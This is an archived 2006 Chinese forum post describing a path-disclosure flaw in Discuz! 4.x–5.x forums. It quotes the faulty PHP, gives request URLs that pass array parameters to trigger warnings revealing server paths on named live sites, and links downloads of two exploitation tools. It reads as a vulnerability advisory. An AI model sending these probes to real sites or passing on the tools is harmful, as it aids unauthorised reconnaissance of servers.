中国网管论坛's Archiver

连长 发表于 2006-12-18 19:01

Discuz论坛爆物理路径原理+工具

[size=3]一共有两个版本。一个vb.net 2005写的,需要.net环境,一个是DELPHI写的。
来源:火狐技术联盟
原理及发现:Zizzy
Discovery By Zizzy
2006-8-17

受影响版本
Discuz!5.2
Discuz!5.1
Discuz!4.1
Discuz!4.0
.............

1.common.inc.php问题代码207行

[img]http://www.tanpao.com/blog/images/code.gif[/img] 程序代码
.....
$navtitle = $navigation = '';
$extra = isset($extra) && preg_match("/^[&=;a-z0-9]+$/i", $extra) ? $extra : '';
$tpp = intval(empty($_DSESSION['tpp']) ? $topicperpage : $_DSESSION['tpp']);
$ppp = intval(empty($_DSESSION['ppp']) ? $postperpage : $_DSESSION['ppp']);
.......


提交:
[/size][url=http://www.discuz.net/post.php?action=newthread][size=3][color=#0000ff]http://www.discuz.net/post.php?action=newthread[/color][/size][/url][size=3]&fid=32&extra[]=page%3D1
返回

[img]http://www.tanpao.com/blog/images/code.gif[/img] 程序代码
Warning: preg_match() expects parameter 2 to be string, array given in

/home/www/wwwroot/www.discuz.net/include/common.inc.php on line 209



2.依然是extra数组的问题
提交

[/size][url=http://bbs.cnbct.org/viewthread.php?tid=316][size=3][color=#0000ff]http://bbs.cnbct.org/viewthread.php?tid=316[/color][/size][/url][size=3]&pid=1453&page=1&extra[]=page%3D1#pid1453

[img]http://www.tanpao.com/blog/images/code.gif[/img] 程序代码
Warning: preg_match() expects parameter 2 to be string, array given in

/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php on line 206
?
Warning: Cannot modify header information - headers already sent by (output started at

/home/.cattia/bct/bbs.cnbct.org/include/common.inc.php:206) in

/home/.cattia/bct/bbs.cnbct.org/include/global.func.php on line 139



3.global.func.php问题代码306行

[img]http://www.tanpao.com/blog/images/code.gif[/img] 程序代码
function ispage($number) {
return !empty($number) && preg_match ("/^([0-9]+)$/", $number);
}


提交:
[/size][url=http://www.discuz.net/viewthread.php?tid=316][size=3][color=#0000ff]http://www.discuz.net/viewthread.php?tid=316[/color][/size][/url][size=3]&pid=1453&page[]=1&extra=page%3D1#pid1453
返回

[img]http://www.tanpao.com/blog/images/code.gif[/img] 程序代码
Warning: preg_match() expects parameter 2 to be string, array given in

/home/www/wwwroot/www.discuz.net/include/global.func.php on line 306


总结
当把变量当成数组提交时,如果不存在该数组,但存在变量,后面的preg_match()正则表达式匹配不了,

这样就出现了绝对路径的泄露

[color=red]利用工具:[/color]
discuz论坛爆绝对路径辅助利用工具(vb.net 2005写的)
作者:T4nk

[img]http://photo4.yupoo.com/20061129/133200_1883508202.jpg[/img]
[color=blue]下载:[/color]  [/size][url=http://www.upx.com.cn/uploads/200611/27_152918_dz.rar][size=3][color=#0000ff]27_152918_dz.rar[/color][/size][/url]

[size=3]Discuz论坛物理路径爆破器(DELPHI写的)
作者:童童

[img]http://photo4.yupoo.com/20061129/133201_1367046268.jpg[/img]
[color=blue]下载:[/color] [/size][url=http://free5.ys168.com/?tongtong520][size=3][color=#800080]http://free5.ys168.com/?tongtong520 [/color][/size][/url]

[size=3]论坛的也的有这个问题[/size]

[size=3][/size]
[attach]13174[/attach]

pilot88 发表于 2007-1-10 17:21

呵呵 看下先! 谢谢!

页: [1]

Powered by Discuz! Archiver 6.1.0  © 1999-2008 bbs.bitsCN.com